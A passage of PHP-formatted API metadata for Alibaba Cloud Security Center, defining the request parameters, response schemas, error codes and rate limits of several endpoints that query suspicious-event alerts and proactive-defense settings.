'int64', 'required' => false, 'example' => '196072141348****', 'title' => ''], 'required' => false, 'title' => '', 'example' => '', ], ], [ 'name' => 'SupportOperateCodeList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'List of supported alarm operation types', 'type' => 'array', 'items' => ['description' => 'Supported alarm operation types: '."\n" .'- **AI.false_positive**: Suspected false positive '."\n" .'- **AI.real_attack**: Real attack '."\n" .'- **AI.Insufficient_information_to_evaluate**: Insufficient information to evaluate', 'type' => 'string', 'required' => false, 'example' => 'AI.real_attack', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'DetectSource', 'in' => 'query', 'schema' => ['description' => 'Source of discovery (invalid field)', 'type' => 'string', 'required' => false, 'example' => 'linux', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request.'."\n", 'type' => 'string', 'example' => '0D6E20E4-8326-1D03-A553-2182BE9E82F9', 'title' => ''], 'TotalCount' => ['description' => 'The total number of alert events.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'SuspEvents' => [ 'description' => 'The information about the alert events.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Stages' => ['description' => 'The stage at which the attack is detected.'."\n", 'type' => 'string', 'example' => '"["authority_maintenance"]"', 'title' => ''], 'TacticItems' => [ 'title' => '', 'description' => 'The display name of the attack stage.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'TacticId' => ['description' => 'The stage information about ATT\\&CK.'."\n", 'type' => 'string', 'example' => 'TA0001', 'title' => ''], 'TacticDisplayName' => ['description' => 'The tactic name of ATT\\&CK.'."\n", 'type' => 'string', 'example' => 'Malicious scripts-Malicious script code execution', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'example' => '', ], 'InternetIp' => ['description' => 'The public IP address of the associated instance.'."\n", 'type' => 'string', 'example' => '1.2.XX.XX', 'title' => ''], 'K8sClusterName' => ['description' => 'The name of the Kubernetes cluster.'."\n", 'type' => 'string', 'example' => 'test-daily', 'title' => ''], 'ContainerImageId' => ['description' => 'The ID of the container image.'."\n", 'type' => 'string', 'example' => 'sha256:2e5a3b0ae5f452b3cb458789a9a7542ef40035a84318469a8528c5e444db1****', 'title' => ''], 'LastTimeStamp' => ['description' => 'The timestamp when the alert event was last detected. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1631699497000', 'title' => ''], 'OccurrenceTime' => ['description' => 'The time when the alert event was first detected.'."\n", 'type' => 'string', 'example' => '2018-09-26 01:51:01', 'title' => ''], 'AlarmUniqueInfo' => ['description' => 'The unique ID of the alert event.'."\n", 'type' => 'string', 'example' => '8df914418f****', 'title' => ''], 'Desc' => ['description' => 'The impact of the alert event.'."\n", 'type' => 'string', 'example' => 'webshell', 'title' => ''], 'CanCancelFault' => ['description' => 'Indicates whether you can cancel marking the alert event as a false positive. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'false', 'title' => ''], 'AlarmEventNameDisplay' => ['description' => 'The name of the alert.'."\n", 'type' => 'string', 'example' => 'Login with unusual location', 'title' => ''], 'AppName' => ['description' => 'The name of the application to which the alert event belongs.'."\n", 'type' => 'string', 'example' => 'pro-deploy-tibasic', 'title' => ''], 'SecurityEventIds' => ['description' => 'The ID of the associated alert event.'."\n", 'type' => 'string', 'example' => '270789', 'title' => ''], 'K8sClusterId' => ['description' => 'The ID of the Kubernetes cluster.'."\n", 'type' => 'string', 'example' => 'c517b37e1401e4961b3951863a49a****', 'title' => ''], 'ContainerImageName' => ['description' => 'The name of the container image.'."\n", 'type' => 'string', 'example' => 'centos7_apache:v1.0.1', 'title' => ''], 'MarkMisRules' => ['description' => 'The advanced whitelist rule.'."\n", 'type' => 'string', 'example' => '1.  path  contain  232  ', 'title' => ''], 'CanBeDealOnLine' => ['description' => 'Indicates whether you can handle the alert event online, such as quarantining the source file of the malicious process. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'ContainHwMode' => ['description' => 'Indicates whether the safeguard mode for major activities is enabled for the server. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'false', 'title' => ''], 'K8sNodeId' => ['description' => 'The ID of the Kubernetes node.'."\n", 'type' => 'string', 'example' => 'i-bp14a1ay8e0aa9t0****'."\n", 'title' => ''], 'InstanceName' => ['description' => 'The name of the associated instance.'."\n", 'type' => 'string', 'example' => 'nginx', 'title' => ''], 'EventStatus' => ['description' => 'The status of the alert event. Valid values:'."\n" ."\n" .'* **1**: pending handling'."\n" .'* **2**: ignored'."\n" .'* **4**: confirmed'."\n" .'* **8**: marked as a false positive'."\n" .'* **16**: handling'."\n" .'* **32**: handled'."\n" .'* **64**: expired'."\n" .'* **604**: marked as a false positive by the system'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '8', 'title' => ''], 'SaleVersion' => ['description' => 'The edition of Security Center in which the alert event can be detected. Valid values:'."\n" ."\n" .'* **0**: Basic edition'."\n" .'* **1**: Enterprise edition'."\n", 'type' => 'string', 'example' => '1', 'title' => ''], 'OperateErrorCode' => ['description' => 'The handling result code of the alert event.'."\n", 'type' => 'string', 'example' => 'kill_and_quara.Success', 'title' => ''], 'Name' => ['description' => 'The complete name of the alert event.'."\n", 'type' => 'string', 'example' => 'Unusual Logon-Login with unusual location', 'title' => ''], 'HasTraceInfo' => ['description' => 'Indicates whether the alert event has tracing information. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'DataSource' => ['description' => 'The source of data. This parameter can be ignored.'."\n", 'type' => 'string', 'example' => 'aegis_suspicious_****', 'title' => ''], 'OperateTime' => ['description' => 'The handling timestamp of the alert event. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1631699497000', 'title' => ''], 'EventSubType' => ['description' => 'The subtype of the alert event.'."\n", 'type' => 'string', 'example' => 'login_common_location', 'title' => ''], 'Advanced' => ['description' => 'Indicates whether the alert event was analyzed offline.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'OccurrenceTimeStamp' => ['description' => 'The timestamp when the alert event was first detected. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1631699497000', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the affected asset.'."\n", 'type' => 'string', 'example' => 'i-9dp6dwsxdl9z5u1e2f****', 'title' => ''], 'AlarmEventTypeDisplay' => ['description' => 'The display name of the type of the alert event.'."\n", 'type' => 'string', 'example' => 'Unusual Logon', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the associated instance.'."\n", 'type' => 'string', 'example' => '100.100.XX.XX', 'title' => ''], 'LastTime' => ['description' => 'The time when the alert event was last detected.'."\n", 'type' => 'string', 'example' => '2018-09-26 01:51:01', 'title' => ''], 'OperateMsg' => ['description' => 'The handing result message of the alert event.'."\n", 'type' => 'string', 'example' => 'success', 'title' => ''], 'Uuid' => ['description' => 'The unique ID of the associated instance.'."\n", 'type' => 'string', 'example' => 'bf6b30d3-eea8-4924-9f0a-****', 'title' => ''], 'K8sPodName' => ['description' => 'The name of the Kubernetes pod.'."\n", 'type' => 'string', 'example' => 'myapp-pod'."\n", 'title' => ''], 'ContainerId' => ['description' => 'The ID of the container.'."\n", 'type' => 'string', 'example' => 'container_1648601865161_14925_02_000****', 'title' => ''], 'AlarmEventType' => ['description' => 'The type of the alert event.'."\n", 'type' => 'string', 'example' => 'Unusual Logon', 'title' => ''], 'K8sNamespace' => ['description' => 'The namespace of the Kubernetes cluster.'."\n", 'type' => 'string', 'example' => 'default', 'title' => ''], 'AutoBreaking' => ['description' => 'Indicates whether automatic defense is enabled.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'K8sNodeName' => ['description' => 'The name of the Kubernetes node.'."\n", 'type' => 'string', 'example' => 'N/A', 'title' => ''], 'AlarmEventName' => ['description' => 'The name of the alert event.'."\n", 'type' => 'string', 'example' => 'login_common_location', 'title' => ''], 'UniqueInfo' => ['description' => 'The unique key of the alert.'."\n", 'type' => 'string', 'example' => 'e17e****', 'title' => ''], 'MaliciousRuleStatus' => ['description' => 'The status of the malicious behavior defense rule. Valid values:'."\n" ."\n" .'* **open**'."\n" .'* **close**'."\n", 'type' => 'string', 'example' => 'open', 'title' => ''], 'Level' => ['description' => 'The severity of the alert event. Valid values:'."\n" ."\n" .'* **serious**'."\n" .'* **suspicious**'."\n" .'* **remind**'."\n", 'type' => 'string', 'example' => 'serious', 'title' => ''], 'Id' => ['description' => 'The unique ID of the alert event.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1000', 'title' => ''], 'Details' => [ 'description' => 'The details of the alert event.'."\n", 'type' => 'array', 'items' => [ 'description' => 'Details of the exception event.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the alert event.'."\n", 'type' => 'string', 'example' => 'text', 'title' => ''], 'Value' => ['description' => 'The path of the alert event.'."\n", 'type' => 'string', 'example' => '/etc/crontab', 'title' => ''], 'NameDisplay' => ['description' => 'The display name of the alert event.'."\n", 'type' => 'string', 'example' => 'Login with unusual location', 'title' => ''], 'ValueDisplay' => ['description' => 'The display name of the path of the alert event.'."\n", 'type' => 'string', 'example' => '/etc/crontab', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'EventNotes' => [ 'description' => 'The note information about the alert event.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Note' => ['description' => 'The note.'."\n", 'type' => 'string', 'example' => 'Test', 'title' => ''], 'NoteId' => ['description' => 'The ID of the note.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '123', 'title' => ''], 'NoteTime' => ['description' => 'The time when the note was created.'."\n", 'type' => 'string', 'example' => '2018-09-26 01:51:01'."\n", 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'clusterId' => ['description' => 'The ID of the cluster.'."\n", 'type' => 'string', 'example' => 'c2051775877374cccbf68af596e6****', 'title' => ''], 'ImageUuid' => ['description' => 'The UUID of the image.'."\n", 'type' => 'string', 'example' => '70489fb520cea585ad9761d5a842****', 'title' => ''], 'DisplaySandboxResult' => ['description' => 'Indicates whether the alert event can be detected by cloud sandbox. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'LargeModel' => ['description' => 'Indicates whether the large model analysis tag is supported. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'MarkList' => [ 'description' => 'The tags of the alert events.'."\n", 'type' => 'array', 'items' => ['description' => 'The tag of the alert event.'."\n", 'type' => 'string', 'example' => 'mark', 'title' => ''], 'title' => '', 'example' => '', ], 'SourceAliUid' => ['description' => 'The ID of the Alibaba Cloud account within which an alert is generated.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '196072141348****', 'title' => ''], 'SupportOperateCode' => ['description' => 'Supported alarm operation types: '."\n" .'- **AI.false_positive**: Suspected false positive '."\n" .'- **AI.real_attack**: Real attack '."\n" .'- **AI.Insufficient_information_to_evaluate**: Insufficient information to evaluate', 'type' => 'string', 'example' => 'AI.real_attack', 'title' => ''], 'DetectSource' => ['description' => 'Source of discovery (invalid field)', 'type' => 'string', 'example' => 'linux', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'UnknownError', 'errorMessage' => 'UnknownError', 'description' => ''], ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"RequestId\\": \\"0D6E20E4-8326-1D03-A553-2182BE9E82F9\\",\\n \\"TotalCount\\": 100,\\n \\"Count\\": 20,\\n \\"SuspEvents\\": [\\n {\\n \\"Stages\\": \\"\\\\\\"[\\\\\\"authority_maintenance\\\\\\"]\\\\\\"\\",\\n \\"TacticItems\\": [\\n {\\n \\"TacticId\\": \\"TA0001\\",\\n \\"TacticDisplayName\\": \\"Malicious scripts-Malicious script code execution\\"\\n }\\n ],\\n \\"InternetIp\\": \\"1.2.XX.XX\\",\\n \\"K8sClusterName\\": \\"test-daily\\",\\n \\"ContainerImageId\\": \\"sha256:2e5a3b0ae5f452b3cb458789a9a7542ef40035a84318469a8528c5e444db1****\\",\\n \\"LastTimeStamp\\": 1631699497000,\\n \\"OccurrenceTime\\": \\"2018-09-26 01:51:01\\",\\n \\"AlarmUniqueInfo\\": \\"8df914418f****\\",\\n \\"Desc\\": \\"webshell\\",\\n \\"CanCancelFault\\": false,\\n \\"AlarmEventNameDisplay\\": \\"Login with unusual location\\",\\n \\"AppName\\": \\"pro-deploy-tibasic\\",\\n \\"SecurityEventIds\\": \\"270789\\",\\n \\"K8sClusterId\\": \\"c517b37e1401e4961b3951863a49a****\\",\\n \\"ContainerImageName\\": \\"centos7_apache:v1.0.1\\",\\n \\"MarkMisRules\\": \\"1.  path  contain  232  \\",\\n \\"CanBeDealOnLine\\": true,\\n \\"ContainHwMode\\": false,\\n \\"K8sNodeId\\": \\"i-bp14a1ay8e0aa9t0****\\\\n\\",\\n \\"InstanceName\\": \\"nginx\\",\\n \\"EventStatus\\": 8,\\n \\"SaleVersion\\": \\"1\\",\\n \\"OperateErrorCode\\": \\"kill_and_quara.Success\\",\\n \\"Name\\": \\"Unusual Logon-Login with unusual location\\",\\n \\"HasTraceInfo\\": true,\\n \\"DataSource\\": \\"aegis_suspicious_****\\",\\n \\"OperateTime\\": 1631699497000,\\n \\"EventSubType\\": \\"login_common_location\\",\\n \\"Advanced\\": true,\\n \\"OccurrenceTimeStamp\\": 1631699497000,\\n \\"InstanceId\\": \\"i-9dp6dwsxdl9z5u1e2f****\\",\\n \\"AlarmEventTypeDisplay\\": \\"Unusual Logon\\",\\n \\"IntranetIp\\": \\"100.100.XX.XX\\",\\n \\"LastTime\\": \\"2018-09-26 01:51:01\\",\\n \\"OperateMsg\\": \\"success\\",\\n \\"Uuid\\": \\"bf6b30d3-eea8-4924-9f0a-****\\",\\n \\"K8sPodName\\": \\"myapp-pod\\\\n\\",\\n \\"ContainerId\\": \\"container_1648601865161_14925_02_000****\\",\\n \\"AlarmEventType\\": \\"Unusual Logon\\",\\n \\"K8sNamespace\\": \\"default\\",\\n \\"AutoBreaking\\": true,\\n \\"K8sNodeName\\": \\"N/A\\",\\n \\"AlarmEventName\\": \\"login_common_location\\",\\n \\"UniqueInfo\\": \\"e17e****\\",\\n \\"MaliciousRuleStatus\\": \\"open\\",\\n \\"Level\\": \\"serious\\",\\n \\"Id\\": 1000,\\n \\"Details\\": [\\n {\\n \\"Type\\": \\"text\\",\\n \\"Value\\": \\"/etc/crontab\\",\\n \\"NameDisplay\\": \\"Login with unusual location\\",\\n \\"ValueDisplay\\": \\"/etc/crontab\\"\\n }\\n ],\\n \\"EventNotes\\": [\\n {\\n \\"Note\\": \\"Test\\",\\n \\"NoteId\\": 123,\\n \\"NoteTime\\": \\"2018-09-26 01:51:01\\\\n\\"\\n }\\n ],\\n \\"clusterId\\": \\"c2051775877374cccbf68af596e6****\\",\\n \\"ImageUuid\\": \\"70489fb520cea585ad9761d5a842****\\",\\n \\"DisplaySandboxResult\\": true,\\n \\"LargeModel\\": true,\\n \\"MarkList\\": [\\n \\"mark\\"\\n ],\\n \\"SourceAliUid\\": 0,\\n \\"SupportOperateCode\\": \\"AI.real_attack\\",\\n \\"DetectSource\\": \\"linux\\"\\n }\\n ]\\n}","type":"json"}]', 'title' => 'DescribeSuspEvents', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSuspEvents'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeSuspEvents', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeSuspiciousOverallConfig' => [ 'summary' => 'Queries the configuration of a specified feature.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92217', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '39.161.XX.XX', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of the feature. Valid values:'."\n" ."\n" .'* **auto_breaking**: Anti-Virus'."\n" .'* **ransomware_breaking**: Anti-ransomware (Bait Capture)'."\n" .'* **webshell\\_cloud_breaking**: Webshell Protection'."\n" .'* **alinet**: Behavior prevention'."\n" .'* **k8s\\_log_analysis**: K8s Threat Detection'."\n" .'* **alisecguard**: Defense mode for Client Protection', 'type' => 'string', 'required' => true, 'example' => 'auto_breaking', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '6673D49C-A9AB-40DD-B4A2-B92306701AE7', 'title' => ''], 'OverallConfig' => [ 'description' => 'The configuration.'."\n", 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the feature. Valid values:'."\n" ."\n" .'* **auto_breaking**: Anti-Virus'."\n" .'* **ransomware_breaking**: Anti-ransomware (Bait Capture)'."\n" .'* **webshell\\_cloud_breaking**: Webshell Protection'."\n" .'* **alinet**: Behavior prevention'."\n" .'* **k8s\\_log_analysis**: K8s Threat Detection'."\n" .'* **alisecguard**: Defense mode for Client Protection', 'type' => 'string', 'example' => 'auto_breaking', 'title' => ''], 'Config' => ['description' => 'The status of the feature. Valid values:'."\n" ."\n" .'* **off**: disabled'."\n" .'* **on**: enabled'."\n", 'type' => 'string', 'example' => 'on', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'AccountIdNotExist', 'errorMessage' => 'AccountId not exist', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"6673D49C-A9AB-40DD-B4A2-B92306701AE7\\",\\n \\"OverallConfig\\": {\\n \\"Type\\": \\"auto_breaking\\",\\n \\"Config\\": \\"on\\"\\n }\\n}","type":"json"}]', 'title' => 'DescribeSuspiciousOverallConfig', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '30', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSuspiciousOverallConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeSuspiciousOverallConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeSuspiciousSecurityEventyStatistics' => [ 'summary' => 'Query Alarm Security Event Statistics', 'path' => '', 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasNB8R24'], ], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The ID of the current request, which is a unique identifier generated by Alibaba Cloud for this request and can be used to troubleshoot and locate issues.', 'type' => 'string', 'example' => 'F8B6F758-BCD4-597A-8A2C-DA5A552C****'], 'Statistic' => [ 'description' => 'Statistical information.', 'type' => 'object', 'properties' => [ 'AntiRansomwareStatistic' => [ 'description' => 'Statistical information.', 'type' => 'object', 'properties' => [ 'SecurityEventCount' => ['description' => 'Number of security events.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'SecurityEventMachine' => [ 'description' => 'Asset information associated with the security event.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'UUID of the asset instance.', 'type' => 'string', 'example' => '3c7ebe83-80ea-44c7-88c3-103bbd87xxxx', 'title' => ''], 'RegionId' => ['description' => 'Region ID.', 'type' => 'string', 'example' => 'cn-shanghai', 'title' => ''], 'InstanceName' => ['description' => 'Instance name.', 'type' => 'string', 'example' => 'TYMH-TYRZ-06', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Query Alarm Security Event Statistics', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeSuspiciousSecurityEventyStatistics', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F8B6F758-BCD4-597A-8A2C-DA5A552C****\\",\\n \\"Statistic\\": {\\n \\"AntiRansomwareStatistic\\": {\\n \\"SecurityEventCount\\": 10,\\n \\"SecurityEventMachine\\": [\\n {\\n \\"Uuid\\": \\"3c7ebe83-80ea-44c7-88c3-103bbd87xxxx\\",\\n \\"RegionId\\": \\"cn-shanghai\\",\\n \\"InstanceName\\": \\"TYMH-TYRZ-06\\"\\n }\\n ]\\n }\\n }\\n}","type":"json"}]', ], 'DescribeSuspiciousUUIDConfig' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '101926', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], ], 'parameters' => [ [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of proactive defense. Valid values:'."\n" ."\n" .'* **auto_breaking**: virus defense'."\n" .'* **ransomware_breaking**: ransomware capture'."\n" .'* **webshell_cloud_breaking**: webshell defense'."\n" .'* **alinet**: malicious behavior defense'."\n" .'* **alisecguard**: client protection'."\n", 'type' => 'string', 'required' => true, 'example' => 'alinet', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'The total number of servers on which proactive defense of the specified type takes effect.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '6044DC07-86F1-5DDA-A611-EC578EA4EEE6', 'title' => ''], 'UUIDList' => [ 'description' => 'The UUIDs of servers on which proactive defense of the specified type takes effect.'."\n", 'type' => 'array', 'items' => ['description' => 'The UUID of the server on which proactive defense of the specified type takes effect.'."\n", 'type' => 'string', 'example' => '0011ea53-738c-4bff-93be-ce6a1cc9****', 'title' => ''], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'ConsoleError', 'errorMessage' => 'The error message is %s %s.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'DescribeSuspiciousUUIDConfig', 'summary' => 'Queries the UUIDs of servers on which proactive defense of a specified type takes effect.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '15', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSuspiciousUUIDConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeSuspiciousUUIDConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"Count\\": 2,\\n \\"RequestId\\": \\"6044DC07-86F1-5DDA-A611-EC578EA4EEE6\\",\\n \\"UUIDList\\": [\\n \\"0011ea53-738c-4bff-93be-ce6a1cc9****\\"\\n ]\\n}","errorExample":""},{"type":"xml","example":"\\n 2\\n 6044DC07-86F1-5DDA-A611-EC578EA4EEE6\\n \\"0011ea53-738c-4bff-93be-ce6a1cc9****\\", \\"0029c328-53de-40e6-b432-df820f0e****\\"\\n","errorExample":""}]', ], 'DescribeSyncAssetTaskList' => [ 'summary' => 'Queries the list of asset synchronization IDC scan tasks.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'list', 'abilityTreeCode' => '92218', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page in a paged query. Default value: 20. If the PageSize parameter is left empty, 20 entries are returned by default.'."\n" .'> Do not leave PageSize empty.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return. Default value: 1, which indicates that the first page is returned.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'TaskName', 'in' => 'query', 'schema' => ['description' => 'The task name.', 'type' => 'string', 'required' => false, 'example' => 'IDC_PROBE_SCAN***', 'title' => ''], ], [ 'name' => 'StartTime', 'in' => 'query', 'schema' => ['description' => 'The start timestamp of the IDC scan task to query. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1652063828796', 'title' => ''], ], [ 'name' => 'EndTime', 'in' => 'query', 'schema' => ['description' => 'The end timestamp of the IDC scan task to query. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1662430077000', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '24A20733-10A0-4AF6-BE6B-E3322413BB68', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of IDC scan tasks displayed per page in a paged query. Default value: 20.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of IDC scan tasks returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '110', 'title' => ''], 'Count' => ['description' => 'The number of IDC scan tasks displayed on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], ], 'title' => '', 'example' => '', ], 'TaskRecords' => [ 'description' => 'The list of IDC scan tasks.', 'type' => 'array', 'items' => [ 'description' => 'The IDC scan task.', 'type' => 'object', 'properties' => [ 'TaskType' => ['description' => 'The task type. The value is fixed as **IDC_PROBE_SCAN**, which indicates an IDC scan task.', 'type' => 'string', 